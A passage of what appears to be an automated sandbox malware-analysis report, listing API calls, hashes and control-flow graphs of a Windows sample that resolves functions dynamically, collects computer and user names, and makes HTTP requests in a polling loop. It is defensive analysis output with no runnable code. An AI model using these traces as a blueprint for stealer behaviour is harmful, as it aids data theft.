                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: f5e6772ec4fc7a2796d0bd9b1e5894cb93b83282cf1f1caf070ed9e52df898e0
                              • Instruction ID: dfb2a0ccbbdf62885b74c7e1170082abc22beb138812785f59f82f3f22803364
                              • Opcode Fuzzy Hash: f5e6772ec4fc7a2796d0bd9b1e5894cb93b83282cf1f1caf070ed9e52df898e0
                              • Instruction Fuzzy Hash: A812E47291011DAADB18EB90DE93FEEB339AF14304F5041ADB10662491EF787E49DB62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 204910939c12d502d0df0fc1bbbfc31b350e1a08adb8f1b32ca04bafa2213fbf
                              • Instruction ID: 13446c0e512c48c067a3abf7bb95c2dbcd8046fc60212a4a61287b2e28cfc113
                              • Opcode Fuzzy Hash: 204910939c12d502d0df0fc1bbbfc31b350e1a08adb8f1b32ca04bafa2213fbf
                              • Instruction Fuzzy Hash: 930162B1904205EFC714DF95D946FAEBBB8FB44B21F10422EE555A3680C77959408BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: a50fbea8f942e7dd736a9b85938afde8b33249938cc435cbc9517f30b3ca4f9d
                              • Instruction ID: 7e7c080114c452236dc700b67ad7df230b750478a740a67b3e8661db04a19792
                              • Opcode Fuzzy Hash: a50fbea8f942e7dd736a9b85938afde8b33249938cc435cbc9517f30b3ca4f9d
                              • Instruction Fuzzy Hash: D4F0A4B1904209AFC714DF84D946FAEBBB8FB04711F10022DF615A3680C77815448BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 0011fb4f2055730ef30bc980c491acba2c743a7ad7d8eb2e3ce60421f6d509d4
                              • Instruction ID: 0e1ca9d6ee6f7413b388f95b2c99b4b16f1ff373fcd018a324f0db53abb1d830
                              • Opcode Fuzzy Hash: 0011fb4f2055730ef30bc980c491acba2c743a7ad7d8eb2e3ce60421f6d509d4
                              • Instruction Fuzzy Hash: 83D017749002089BCB149AA0A849ADDBB78FB08211F000668D90A62240EA3164828BA5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 fc9c10-fc9c1a 634 fca036-fca0ca LoadLibraryA * 8 633->634 635 fc9c20-fca031 GetProcAddress * 43 633->635 636 fca0cc-fca141 GetProcAddress * 5 634->636 637 fca146-fca14d 634->637 635->634 636->637 638 fca216-fca21d 637->638 639 fca153-fca211 GetProcAddress * 8 637->639 640 fca21f-fca293 GetProcAddress * 5 638->640 641 fca298-fca29f 638->641 639->638 640->641 642 fca2a5-fca332 GetProcAddress * 6 641->642 643 fca337-fca33e 641->643 642->643 644 fca41f-fca426 643->644 645 fca344-fca41a GetProcAddress * 9 643->645 646 fca428-fca49d GetProcAddress * 5 644->646 647 fca4a2-fca4a9 644->647 645->644 646->647 648 fca4dc-fca4e3 647->648 649 fca4ab-fca4d7 GetProcAddress * 2 647->649 650 fca515-fca51c 648->650 651 fca4e5-fca510 GetProcAddress * 2 648->651 649->648 652 fca612-fca619 650->652 653 fca522-fca60d GetProcAddress * 10 650->653 651->650 654 fca67d-fca684 652->654 655 fca61b-fca678 GetProcAddress * 4 652->655 653->652 656 fca69e-fca6a5 654->656 657 fca686-fca699 GetProcAddress 654->657 655->654 658 fca708-fca709 656->658 659 fca6a7-fca703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(77190000,00DD6090), ref: 00FC9C2D
                              • GetProcAddress.KERNEL32(77190000,00DD5F70), ref: 00FC9C45
                              • GetProcAddress.KERNEL32(77190000,00DE95A8), ref: 00FC9C5E
                              • GetProcAddress.KERNEL32(77190000,00DE9608), ref: 00FC9C76
                              • GetProcAddress.KERNEL32(77190000,00DE95F0), ref: 00FC9C8E
                              • GetProcAddress.KERNEL32(77190000,00DE9A28), ref: 00FC9CA7
                              • GetProcAddress.KERNEL32(77190000,00DDA968), ref: 00FC9CBF
                              • GetProcAddress.KERNEL32(77190000,00DE99C8), ref: 00FC9CD7
                              • GetProcAddress.KERNEL32(77190000,00DE9B60), ref: 00FC9CF0
                              • GetProcAddress.KERNEL32(77190000,00DE9A58), ref: 00FC9D08
                              • GetProcAddress.KERNEL32(77190000,00DE99E0), ref: 00FC9D20
                              • GetProcAddress.KERNEL32(77190000,00DD5F30), ref: 00FC9D39
                              • GetProcAddress.KERNEL32(77190000,00DD5F90), ref: 00FC9D51
                              • GetProcAddress.KERNEL32(77190000,00DD6290), ref: 00FC9D69
                              • GetProcAddress.KERNEL32(77190000,00DD60D0), ref: 00FC9D82
                              • GetProcAddress.KERNEL32(77190000,00DE99B0), ref: 00FC9D9A
                              • GetProcAddress.KERNEL32(77190000,00DE9B78), ref: 00FC9DB2
                              • GetProcAddress.KERNEL32(77190000,00DDAD78), ref: 00FC9DCB
                              • GetProcAddress.KERNEL32(77190000,00DD60F0), ref: 00FC9DE3
                              • GetProcAddress.KERNEL32(77190000,00DE9AB8), ref: 00FC9DFB
                              • GetProcAddress.KERNEL32(77190000,00DE9AA0), ref: 00FC9E14
                              • GetProcAddress.KERNEL32(77190000,00DE9AD0), ref: 00FC9E2C
                              • GetProcAddress.KERNEL32(77190000,00DE9A40), ref: 00FC9E44
                              • GetProcAddress.KERNEL32(77190000,00DD61D0), ref: 00FC9E5D
                              • GetProcAddress.KERNEL32(77190000,00DE9AE8), ref: 00FC9E75
                              • GetProcAddress.KERNEL32(77190000,00DE99F8), ref: 00FC9E8D
                              • GetProcAddress.KERNEL32(77190000,00DE9B30), ref: 00FC9EA6
                              • GetProcAddress.KERNEL32(77190000,00DE9A10), ref: 00FC9EBE
                              • GetProcAddress.KERNEL32(77190000,00DE9A70), ref: 00FC9ED6
                              • GetProcAddress.KERNEL32(77190000,00DE9A88), ref: 00FC9EEF
                              • GetProcAddress.KERNEL32(77190000,00DE9B00), ref: 00FC9F07
                              • GetProcAddress.KERNEL32(77190000,00DE9B18), ref: 00FC9F1F
                              • GetProcAddress.KERNEL32(77190000,00DE9B48), ref: 00FC9F38
                              • GetProcAddress.KERNEL32(77190000,00DE04C8), ref: 00FC9F50
                              • GetProcAddress.KERNEL32(77190000,00DEC258), ref: 00FC9F68
                              • GetProcAddress.KERNEL32(77190000,00DEC300), ref: 00FC9F81
                              • GetProcAddress.KERNEL32(77190000,00DD61F0), ref: 00FC9F99
                              • GetProcAddress.KERNEL32(77190000,00DEC348), ref: 00FC9FB1
                              • GetProcAddress.KERNEL32(77190000,00DD6230), ref: 00FC9FCA
                              • GetProcAddress.KERNEL32(77190000,00DEC3D8), ref: 00FC9FE2
                              • GetProcAddress.KERNEL32(77190000,00DEC378), ref: 00FC9FFA
                              • GetProcAddress.KERNEL32(77190000,00DD6270), ref: 00FCA013
                              • GetProcAddress.KERNEL32(77190000,00DD62B0), ref: 00FCA02B
                              • LoadLibraryA.KERNEL32(00DEC270,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA03D
                              • LoadLibraryA.KERNEL32(00DEC390,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA04E
                              • LoadLibraryA.KERNEL32(00DEC360,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA060
                              • LoadLibraryA.KERNEL32(00DEC2D0,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA072
                              • LoadLibraryA.KERNEL32(00DEC3A8,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA083
                              • LoadLibraryA.KERNEL32(00DEC318,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA095
                              • LoadLibraryA.KERNEL32(00DEC3C0,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0A7
                              • LoadLibraryA.KERNEL32(00DEC210,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0B8
                              • GetProcAddress.KERNEL32(77040000,00DD5E30), ref: 00FCA0DA
                              • GetProcAddress.KERNEL32(77040000,00DEC228), ref: 00FCA0F2
                              • GetProcAddress.KERNEL32(77040000,00DE9048), ref: 00FCA10A
                              • GetProcAddress.KERNEL32(77040000,00DEC2B8), ref: 00FCA123
                              • GetProcAddress.KERNEL32(77040000,00DD5EB0), ref: 00FCA13B
                              • GetProcAddress.KERNEL32(705A0000,00DDAB48), ref: 00FCA160
                              • GetProcAddress.KERNEL32(705A0000,00DD5DD0), ref: 00FCA179
                              • GetProcAddress.KERNEL32(705A0000,00DDAAF8), ref: 00FCA191
                              • GetProcAddress.KERNEL32(705A0000,00DEC240), ref: 00FCA1A9
                              • GetProcAddress.KERNEL32(705A0000,00DEC288), ref: 00FCA1C2
                              • GetProcAddress.KERNEL32(705A0000,00DD5C90), ref: 00FCA1DA
                              • GetProcAddress.KERNEL32(705A0000,00DD5C50), ref: 00FCA1F2
                              • GetProcAddress.KERNEL32(705A0000,00DEC2A0), ref: 00FCA20B
                              • GetProcAddress.KERNEL32(768D0000,00DD5DB0), ref: 00FCA22C
                              • GetProcAddress.KERNEL32(768D0000,00DD5BD0), ref: 00FCA244
                              • GetProcAddress.KERNEL32(768D0000,00DEC2E8), ref: 00FCA25D
                              • GetProcAddress.KERNEL32(768D0000,00DEC330), ref: 00FCA275
                              • GetProcAddress.KERNEL32(768D0000,00DD5D70), ref: 00FCA28D
                              • GetProcAddress.KERNEL32(75790000,00DDAAA8), ref: 00FCA2B3
                              • GetProcAddress.KERNEL32(75790000,00DDADA0), ref: 00FCA2CB
                              • GetProcAddress.KERNEL32(75790000,00DEC538), ref: 00FCA2E3
                              • GetProcAddress.KERNEL32(75790000,00DD5D90), ref: 00FCA2FC
                              • GetProcAddress.KERNEL32(75790000,00DD5BB0), ref: 00FCA314
                              • GetProcAddress.KERNEL32(75790000,00DDAA58), ref: 00FCA32C
                              • GetProcAddress.KERNEL32(75A10000,00DEC490), ref: 00FCA352
                              • GetProcAddress.KERNEL32(75A10000,00DD5D10), ref: 00FCA36A
                              • GetProcAddress.KERNEL32(75A10000,00DE9058), ref: 00FCA382
                              • GetProcAddress.KERNEL32(75A10000,00DEC598), ref: 00FCA39B
                              • GetProcAddress.KERNEL32(75A10000,00DEC478), ref: 00FCA3B3
                              • GetProcAddress.KERNEL32(75A10000,00DD5B90), ref: 00FCA3CB
                              • GetProcAddress.KERNEL32(75A10000,00DD5ED0), ref: 00FCA3E4
                              • GetProcAddress.KERNEL32(75A10000,00DEC508), ref: 00FCA3FC
                              • GetProcAddress.KERNEL32(75A10000,00DEC4A8), ref: 00FCA414
                              • GetProcAddress.KERNEL32(76850000,00DD5C30), ref: 00FCA436
                              • GetProcAddress.KERNEL32(76850000,00DEC520), ref: 00FCA44E
                              • GetProcAddress.KERNEL32(76850000,00DEC430), ref: 00FCA466
                              • GetProcAddress.KERNEL32(76850000,00DEC550), ref: 00FCA47F
                              • GetProcAddress.KERNEL32(76850000,00DEC568), ref: 00FCA497
                              • GetProcAddress.KERNEL32(75690000,00DD5D30), ref: 00FCA4B8
                              • GetProcAddress.KERNEL32(75690000,00DD5BF0), ref: 00FCA4D1
                              • GetProcAddress.KERNEL32(769C0000,00DD5C10), ref: 00FCA4F2
                              • GetProcAddress.KERNEL32(769C0000,00DEC418), ref: 00FCA50A
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5B50), ref: 00FCA530
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5B30), ref: 00FCA548
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5E50), ref: 00FCA560
                              • GetProcAddress.KERNEL32(6F8D0000,00DEC580), ref: 00FCA579
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5C70), ref: 00FCA591
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5E70), ref: 00FCA5A9
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5DF0), ref: 00FCA5C2
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5E10), ref: 00FCA5DA
                              • GetProcAddress.KERNEL32(6F8D0000,InternetSetOptionA), ref: 00FCA5F1
                              • GetProcAddress.KERNEL32(6F8D0000,HttpQueryInfoA), ref: 00FCA607
                              • GetProcAddress.KERNEL32(75D90000,00DEC5B0), ref: 00FCA629
                              • GetProcAddress.KERNEL32(75D90000,00DE9068), ref: 00FCA641
                              • GetProcAddress.KERNEL32(75D90000,00DEC5C8), ref: 00FCA659
                              • GetProcAddress.KERNEL32(75D90000,00DEC5E0), ref: 00FCA672
                              • GetProcAddress.KERNEL32(76470000,00DD5CB0), ref: 00FCA693
                              • GetProcAddress.KERNEL32(70220000,00DEC4D8), ref: 00FCA6B4
                              • GetProcAddress.KERNEL32(70220000,00DD5EF0), ref: 00FCA6CD
                              • GetProcAddress.KERNEL32(70220000,00DEC4F0), ref: 00FCA6E5
                              • GetProcAddress.KERNEL32(70220000,00DEC4C0), ref: 00FCA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d2642b652b4baf44aad9eab66d6ad995b910738784057efdb7c84a050902d041
                              • Instruction ID: 374c07b6b46ec172802d9d7f9983b42979c41e2758c9cda8f62d052575212c01
                              • Opcode Fuzzy Hash: d2642b652b4baf44aad9eab66d6ad995b910738784057efdb7c84a050902d041
                              • Instruction Fuzzy Hash: 52621AB5500A01AFC36CDBA9F598D5637F9EF8C242714863EA62EC324CD67EA4C1DB50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 fb6280-fb630b call fca7a0 call fb47b0 call fca740 InternetOpenA StrCmpCA 1040 fb630d 1033->1040 1041 fb6314-fb6318 1033->1041 1040->1041 1042 fb6509-fb6525 call fca7a0 call fca800 * 2 1041->1042 1043 fb631e-fb6342 InternetConnectA 1041->1043 1062 fb6528-fb652d 1042->1062 1045 fb6348-fb634c 1043->1045 1046 fb64ff-fb6503 InternetCloseHandle 1043->1046 1048 fb635a 1045->1048 1049 fb634e-fb6358 1045->1049 1046->1042 1050 fb6364-fb6392 HttpOpenRequestA 1048->1050 1049->1050 1052 fb6398-fb639c 1050->1052 1053 fb64f5-fb64f9 InternetCloseHandle 1050->1053 1055 fb639e-fb63bf InternetSetOptionA 1052->1055 1056 fb63c5-fb6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 fb642c-fb644b call fc8940 1056->1058 1059 fb6407-fb6427 call fca740 call fca800 * 2 1056->1059 1067 fb64c9-fb64e9 call fca740 call fca800 * 2 1058->1067 1068 fb644d-fb6454 1058->1068 1059->1062 1067->1062 1071 fb64c7-fb64ef InternetCloseHandle 1068->1071 1072 fb6456-fb6480 InternetReadFile 1068->1072 1071->1053 1073 fb648b 1072->1073 1074 fb6482-fb6489 1072->1074 1073->1071 1074->1073 1078 fb648d-fb64c5 call fca9b0 call fca8a0 call fca800 1074->1078 1078->1072
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                                • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                              • StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FB63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB646D
                              • InternetCloseHandle.WININET(00000000), ref: 00FB64EF
                              • InternetCloseHandle.WININET(00000000), ref: 00FB64F9
                              • InternetCloseHandle.WININET(00000000), ref: 00FB6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 5fa7e091fc63e480b30b2cb6c74d33468b877813fcd4f175647735efb88bbe32
                              • Instruction ID: 910dbc133d20dedb80586d88d6c6fb1adb3fb88b228db10e67c409018384e9a2
                              • Opcode Fuzzy Hash: 5fa7e091fc63e480b30b2cb6c74d33468b877813fcd4f175647735efb88bbe32
                              • Instruction Fuzzy Hash: A1713C71A00218EBDB24DBA0DC49FEE7778BF44704F1081A9F10AAB1C4DBB96A85DF51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 fc5510-fc5577 call fc5ad0 call fca820 * 3 call fca740 * 4 1106 fc557c-fc5583 1090->1106 1107 fc5585-fc55b6 call fca820 call fca7a0 call fb1590 call fc51f0 1106->1107 1108 fc55d7-fc564c call fca740 * 2 call fb1590 call fc52c0 call fca8a0 call fca800 call fcaad0 StrCmpCA 1106->1108 1124 fc55bb-fc55d2 call fca8a0 call fca800 1107->1124 1134 fc5693-fc56a9 call fcaad0 StrCmpCA 1108->1134 1138 fc564e-fc568e call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1108->1138 1124->1134 1139 fc57dc-fc5844 call fca8a0 call fca820 * 2 call fb1670 call fca800 * 4 call fc6560 call fb1550 1134->1139 1140 fc56af-fc56b6 1134->1140 1138->1134 1270 fc5ac3-fc5ac6 1139->1270 1144 fc56bc-fc56c3 1140->1144 1145 fc57da-fc585f call fcaad0 StrCmpCA 1140->1145 1149 fc571e-fc5793 call fca740 * 2 call fb1590 call fc52c0 call fca8a0 call fca800 call fcaad0 StrCmpCA 1144->1149 1150 fc56c5-fc5719 call fca820 call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1144->1150 1164 fc5865-fc586c 1145->1164 1165 fc5991-fc59f9 call fca8a0 call fca820 * 2 call fb1670 call fca800 * 4 call fc6560 call fb1550 1145->1165 1149->1145 1250 fc5795-fc57d5 call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1149->1250 1150->1145 1171 fc598f-fc5a14 call fcaad0 StrCmpCA 1164->1171 1172 fc5872-fc5879 1164->1172 1165->1270 1201 fc5a28-fc5a91 call fca8a0 call fca820 * 2 call fb1670 call fca800 * 4 call fc6560 call fb1550 1171->1201 1202 fc5a16-fc5a21 Sleep 1171->1202 1179 fc587b-fc58ce call fca820 call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1172->1179 1180 fc58d3-fc5948 call fca740 * 2 call fb1590 call fc52c0 call fca8a0 call fca800 call fcaad0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 fc594a-fc598a call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1180->1275 1201->1270 1202->1106 1250->1145 1275->1171
                              APIs
